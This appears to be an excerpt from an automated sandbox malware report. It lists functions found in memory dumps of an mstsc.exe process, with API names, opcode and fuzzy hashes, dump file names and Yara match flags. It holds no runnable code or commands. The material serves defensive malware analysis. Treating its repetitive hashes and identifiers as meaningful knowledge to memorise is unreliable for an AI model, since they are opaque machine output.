                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6d732fe35c4a03fac7c5a297063bb0cbc4d37e97fcec2eab12e33f4249c0ca45
                                                • Instruction ID: c4f1f30ad581d7bbd5e09a630620873c57e8b684c0a440dce488397cc2dcf160
                                                • Opcode Fuzzy Hash: 6d732fe35c4a03fac7c5a297063bb0cbc4d37e97fcec2eab12e33f4249c0ca45
                                                • Instruction Fuzzy Hash: 3690022921340003F1807158640C60A10459BD1216F99D435A0016558CC915D9696321
                                                Function 04562D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cb85540d30cd2ec019ef99d03c2388efb483bf48efcac02807afc749d4312ac7
                                                • Instruction ID: 7176a0fd1e0dde6f5c42550b6afa8689f1dc369af115920b0761f421aa11af67
                                                • Opcode Fuzzy Hash: cb85540d30cd2ec019ef99d03c2388efb483bf48efcac02807afc749d4312ac7
                                                • Instruction Fuzzy Hash: 0590022130140003F1407158641C6065045EBE1315F59D031E0415554CD915D9566222
                                                Function 04562DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cde451b99e3f2d3380d9d8b977b861a84b93b104b765f6758b801af233615349
                                                • Instruction ID: f652665364870cbd1bbdeaa18f076d085747b3992ed60fe1dbc8f614913927d3
                                                • Opcode Fuzzy Hash: cde451b99e3f2d3380d9d8b977b861a84b93b104b765f6758b801af233615349
                                                • Instruction Fuzzy Hash: C1900221242441537545B15854085075046ABE0255799C032A1415950C8526E956E621
                                                Function 04562DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cdd8648885d8aeac0ba79785bf4633485294e83ee397b80d64eb9bbf0d8c9397
                                                • Instruction ID: 83eba4d7ff31e461e9b085085265cd7ff0b6360f97db9ccb89c114330edd2ed7
                                                • Opcode Fuzzy Hash: cdd8648885d8aeac0ba79785bf4633485294e83ee397b80d64eb9bbf0d8c9397
                                                • Instruction Fuzzy Hash: 2190023120140413F1117158550870710499BD0255F99C432A0425558D9656DA52B121
                                                Function 04562EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aea6b1159c21654584f1c88d29be93b8057756e62e1e78e1aaf7485c0c79aa8a
                                                • Instruction ID: 1b6ab8245d7e57eb1a30dda531db8ae4d04f5cfaf0ebd1060246f17021e78977
                                                • Opcode Fuzzy Hash: aea6b1159c21654584f1c88d29be93b8057756e62e1e78e1aaf7485c0c79aa8a
                                                • Instruction Fuzzy Hash: 6790026120180403F1407558580860710459BD0316F59C031A2065555E8A29DD517135
                                                Function 04562E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3e36525ca44eeb732545a0dbcc4f2c3cff6b0952f10f9a42942c5ef4b8d1cae3
                                                • Instruction ID: dff98772c11ed911138017557a148e61c97f9f589ba87b848b20c2817f443ee8
                                                • Opcode Fuzzy Hash: 3e36525ca44eeb732545a0dbcc4f2c3cff6b0952f10f9a42942c5ef4b8d1cae3
                                                • Instruction Fuzzy Hash: 3290022160140503F10171585408616104A9BD0255F99C032A1025555ECA25DA92B131
                                                Function 04562F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                • Instruction ID: ee8edcbf621cb0824334b0e1d2472cbcb3100ee2f1618637eb91acfb5f077917
                                                • Opcode Fuzzy Hash: 2c1563af0205f4ffa8d140e736a6325945c12b8c04c8e45ac57ae38c0122e091
                                                • Instruction Fuzzy Hash: E290026134140443F10071585418B061045DBE1315F59C035E1065554D8619DD527126
                                                Function 04562FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                • Instruction ID: 42d19e272070ab2aece402a35d61c374bbd9b9140fe5c16974ec6d8eff97cdc4
                                                • Opcode Fuzzy Hash: f726926354531e0c4240a0306e41afc85df0f4ae2d45be4f94f5cd4cc3fb07c9
                                                • Instruction Fuzzy Hash: 38900221211C0043F20075685C18B0710459BD0317F59C135A0155554CC915D9616521
                                                Function 04562FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                • Instruction ID: b1f4acab9003b0547cb9631ffc3705c340c0b5c36a6d00348cdf20d3daeddb43
                                                • Opcode Fuzzy Hash: 80162b598cb603bbaef9173b013ee15ab2a6818cc1f2e6b836f2b550a5b171da
                                                • Instruction Fuzzy Hash: AD900221601400436140716898489065045BFE1225759C131A0999550D8559D9656665
                                                Function 045639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                • Instruction ID: 36b25106e46cf3070012a1eb2d4a4d7bb24cbd0ec34bba7d8f77bf6aeaa62e29
                                                • Opcode Fuzzy Hash: e4ccfc824f49e11f90225b2f14d2b60da7f2345516d925717b86ad1f5ed058f8
                                                • Instruction Fuzzy Hash: 6690022124545103F150715C54086165045BBE0215F59C031A0815594D8555D9557221
                                                Function 04562AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                • Instruction ID: ea16fb98e45fb0956d81b4fcb0b9b814cee72ae1598f6336b8c23751fef10d98
                                                • Opcode Fuzzy Hash: 2b8a83d615065c1205e601ef56e8ca58d4096f498baf98bfdf8de8f999acdc33
                                                • Instruction Fuzzy Hash: 70900225211400032105B558170850710869BD5365359C031F1016550CD621D9616121
                                                Function 04562AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                • Instruction ID: d8c26501daa214b711e123375dab88a1aface8516e5b9be43e8b9ec29a60d13f
                                                • Opcode Fuzzy Hash: aacb2573d21104657af4bb1692d19e3a2c3d5bdc35168a103a5e618e60b09e37
                                                • Instruction Fuzzy Hash: 60900225221400032145B558160850B1485ABD6365399C035F1417590CC621D9656321
                                                Function 04562B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                • Instruction ID: 2210919ebb985fc7b54288cf86f9faab11afb86523914287cf8a27189a71d337
                                                • Opcode Fuzzy Hash: 9aeed9a0e49d990506707909f10810b70ad90d48ec5b088e95f30bf1c618fefb
                                                • Instruction Fuzzy Hash: A790026120240003610571585418616504A9BE0215B59C031E1015590DC525D9917125
                                                Function 04562BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                • Instruction ID: 11bfd8b6d539e6d8c1a646d502600f8d04fe8af5d7cc921c0c26a7b36145c1f0
                                                • Opcode Fuzzy Hash: b58a0b391df063a78ee4e684351e2593616872820e1ad31ea6b306cd367a1bc0
                                                • Instruction Fuzzy Hash: 6E90023120140803F1807158540864A10459BD1315F99C035A0026654DCA15DB5977A1
                                                Function 04562BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                • Instruction ID: 8071c73653cca747197d48c6b29558b3e4cbf58a0afbd7c3ae752d22714ae6bf
                                                • Opcode Fuzzy Hash: 4ac86b2d1f68183cf954c1bf4321e65573c3682d19264c8bfdc9db2b10b513d4
                                                • Instruction Fuzzy Hash: D190023120544843F14071585408A4610559BD0319F59C031A0065694D9625DE55B661
                                                Function 04562BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                • Instruction ID: a403c4c12489cde3cbecb6537161de93861404ef4ead4d022622d046854b5eeb
                                                • Opcode Fuzzy Hash: 57dc70d2a811cd5d65bad0df4d95709a763362ad08b2fe12fe37c7091cb3e0ff
                                                • Instruction Fuzzy Hash: 6D90023160540803F1507158541874610459BD0315F59C031A0025654D8755DB5576A1
                                                Function 0049F36A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InitializeUninitialize
                                                • String ID: @J7<
                                                • API String ID: 3442037557-2016760708
                                                • Opcode ID: 95cab754c156ec44e772b305c88b0ea27e5ece26f81be27aa0f1c5628ca618aa
                                                • Instruction ID: d4d41a3914f96f7398e1d79c712abb661b55d88df8db5ac72cccd5fb77027eed
                                                • Opcode Fuzzy Hash: 95cab754c156ec44e772b305c88b0ea27e5ece26f81be27aa0f1c5628ca618aa
                                                • Instruction Fuzzy Hash: 8A3140B5A0060AAFDF00DFD8C8809EFB7B9FF89304B108569E505EB215D775AE05CBA0
                                                Function 004A3920 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 004A39FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: wininet.dll
                                                • API String ID: 3472027048-3354682871
                                                • Opcode ID: 5d0558d2e442f23693483771b6b27b7c52766ba302a34b4781d3df11571f4a7b
                                                • Instruction ID: 597fdaa5ce0b556de5d4d3a74065b5a010ba7dae650aae629e66ffc659bc7e11
                                                • Opcode Fuzzy Hash: 5d0558d2e442f23693483771b6b27b7c52766ba302a34b4781d3df11571f4a7b
                                                • Instruction Fuzzy Hash: 86318DB1600705BBC714DFA5C881FEBBBBCEB89704F50452EF6496B241D774AB408BA9
                                                Function 004981C9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 004981FC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 8424925addbbab25d62e9b62a130398eeb4a3f09ed71f2d187890bfe43d03395
                                                • Instruction ID: db8107d2abbef482d767ca68bf785d412c94f0c3d3003f0e740e5c9cd5251e62
                                                • Opcode Fuzzy Hash: 8424925addbbab25d62e9b62a130398eeb4a3f09ed71f2d187890bfe43d03395
                                                • Instruction Fuzzy Hash: 0FE0613820050426EF249B78CD42FB637109F46368F1402B8FC59DF2D1D67CD4424700
                                                Function 004981D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 004981FC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_480000_mstsc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: d8724b8d1cf39537f1a6c20e4583a9cd2be8ec5f5b1839b0fe7ed1928af13ace
                                                • Instruction ID: fdbe8079c57570ea2be0637185b3d8eda70accffe2ea0335c9eb3435c7987dc3
                                                • Opcode Fuzzy Hash: d8724b8d1cf39537f1a6c20e4583a9cd2be8ec5f5b1839b0fe7ed1928af13ace
                                                • Instruction Fuzzy Hash: ACE0D83524020816EB246AAC9C41F6333485745724F0405B5FC2C8F2C1D97CE8414154
                                                Function 04562C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044F0000, based on PE: true
                                                • Associated: 00000004.00000002.3897347942.0000000004619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000461D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_44f0000_mstsc.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                • Instruction ID: 7a02658c73526911a238a3ae0a462727ca3f91a2922d9b695a40169f58f391fc
                                                • Opcode Fuzzy Hash: d19266ece675ca2f06f594a44352a3a8cce9988517bae31eebc0201d3b1c881e
                                                • Instruction Fuzzy Hash: 66B09B719015C5DAFB11F760560C71779407BD0715F19C071E2030741E4738D1D1F175